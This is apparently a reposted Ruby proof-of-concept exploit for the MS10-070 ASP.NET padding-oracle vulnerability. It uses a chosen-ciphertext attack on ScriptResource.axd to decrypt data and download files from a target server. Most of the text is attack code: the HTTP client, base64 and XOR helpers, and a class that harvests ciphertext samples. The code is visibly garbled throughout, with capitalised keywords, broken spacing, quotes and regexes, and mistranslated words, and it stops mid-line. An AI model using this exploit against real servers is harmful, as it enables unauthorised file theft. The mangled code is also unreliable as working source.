MS10-070 ASP. NET Auto-Decryptor File Download Exploit

#! /Usr/bin/ruby-w
 
#
# Aspx_ad_chotext_attack.rb
#
# Copyright (c) 2010 AmpliaSECURITY. All rights reserved
#
# Http://www.ampliasecurity.com
# Agustin Azubel-aazubel@ampliasecurity.com
#
#
# MS10-070 ASPX proof of concept
# Decrypt data using an auto decryptor bundled in the aspx framework
# Encrypt data using Rizzo-Duong CBC-R technique
#
# Copyright (c) 2010 Amplia Security. All rights reserved.
#
# Unless you have express writen permission from the Copyright
# Holder, any use of or distribution of this software or portions of it,
# Including, but not limited to, reimplementations, modifications and derived
# Work of it, in either source code or any other form, as well as any other
# Software using or referencing it in any way, may NOT be sold for each cial
# Gain, must be covered by this very same license, and must retain this
# Copyright notice and this license.
# Neither the name of the Copyright Holder nor the names of its contributors
# May be used to endorse or promote products derived from this software
# Without specific prior written permission.
#
#
# This software is provided by the copyright holders and contributors "as is"
# And any express or implied warranties, INCLUDING, but not limited to,
# Implied warranties of merchantability and fitness for a particle PURPOSE
# Are disclaimed. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# Liable for any direct, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# Consequential damages (INCLUDING, but not limited to, PROCUREMENT
# Substitute goods or services; loss of use, DATA, or profits; OR BUSINESS
# INTERRUPTION) however caused and on any theory of liability, WHETHER IN
# CONTRACT, strict liability, or tort (including negligence or otherwise)
# Arising in any way out of the use of this software, EVEN IF ADVISED OF
# Possibility of such damage.
#
 
 
Require net/http
Require uri
Require rexml/document
 
 
$ Debugging = false
 
 
 
Module XArray
Def hex_inspect
"[# {Length}] [# {map {| x. hex_inspect}. join", "}]"
End
End
 
Class Array
Include XArray
End
 
 
 
 
Require base64
 
Class XBase64
Def self. encode s
S = Base64.encode64 s
S = s. gsub + ,-
S = s. gsub /,_
S = s. gsub "",
S = s. gsub "",
 
S = XBase64.encode _ base64_padding s
End
 
Def self. encode_base64_padding s
Padding_length = 0
Padding_length + = 1 while s [-1-padding_length, 1] = "="
S [0 .. (-1-padding_length)] + padding_length.to_s
End
 
 
Def self. decode s
S = s. gsub-, +
S = s. gsub _,/
 
S = self. decode_base64_padding s
 
Base64.decode64 s
End
 
Def self. decode_base64_padding s
Padding_length = s [-1, 1]. to_ I
S [0...-1] + ("=" * padding_length)
End
End
 
 
Module XString
Def xor other
Raise RuntimeError, "length mismatch" if self. length! = Other. length
(0... length). map {| I | self [I] ^ other [I]}. map {| x. chr}. join
End
Alias ^: xor
 
Def hex_inspect
Printables = ["a", "", "e", "f", "", "v"] +
(0x20 .. 0x7e). entries
 
"[# {Length}]" + "" # {unpack ("C *"). map {| x |
Printables. include? (X )? X. chr: "\ x % 02x" % x}. join }""
End
 
Def to_blocks blocksize
(0... length/blocksize). map {| I | self [blocksize * I, blocksize]}
End
End
 
Class String
Include XString
End
 
 
 
Class ASPXAutoDecryptorChosenCiphertextAttack
Attr_reader: uri
Attr_reader: filename
Attr_reader: min_filelength
Attr_reader: filere
Attr_reader: http
Attr_reader: d_value
Attr_reader: blocksize
Attr_reader: padding_length
Attr_reader: decrypt_command_mask
Attr_reader: axdpath
Attr_reader: axdname
Attr_reader: base_mask

Def initialize parameters
@ Uri = URI. parse parameters [: uri]
@ Filename = parameters [: filename]
@ Min_filelength = parameters [: min_filelength]
@ Filere = parameters [: filere]
@ Http = http_initialize
@ D_value = nil
@ Base_mask = rand 0 xffff
@ Decrypt_command_mask = nil
@ Blocksize = nil
@ Padding_length = nil
@ Axdpath = nil
@ Axdname = nil

Puts "target :#{@ uri }"
Puts "base_mask: 0x % 04x" % @ base_mask
End
 
Def http_initialize
Http = Net: HTTP. new @ uri. host, @ uri. port
Http. start
Http
End
 
 
Def parse_script_tag xml, re
D = nil
 
Doc = REXML: Document. new xml
Doc. elements. each script do | e |
Src_attribute = e. attributes [src]
Md = re. match src_attribute
D = md [1]
Break
End
 
Raise RuntimeError, "cocould not parse script_tag" unless d
 
D
End
Private: parse_script_tag

Def get_ciphertext_sample
[["ScriptResource. axd", // ScriptResource. axd? D = ([a-zA-Z0-9-\ _] +) & t = [a-z0-9] +/],
]. Each do | name, re |
 
Headers = {User-Agent =>
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1 )}
 
Response = http. get uri. path, headers
Body = response. body
 
Script_tags = body. lines. select {| x. index name}
 
Next if script_tags.empty?
 
Puts "script tags using # {name} [# {script_tags.length}]:"
Puts script_tags.map {| x | "# {x }"}
 
D = parse_script_tag script_tags [0], re
 
Puts "using script: # {name }"
Puts "using d_value: # {d }"
 
& Nb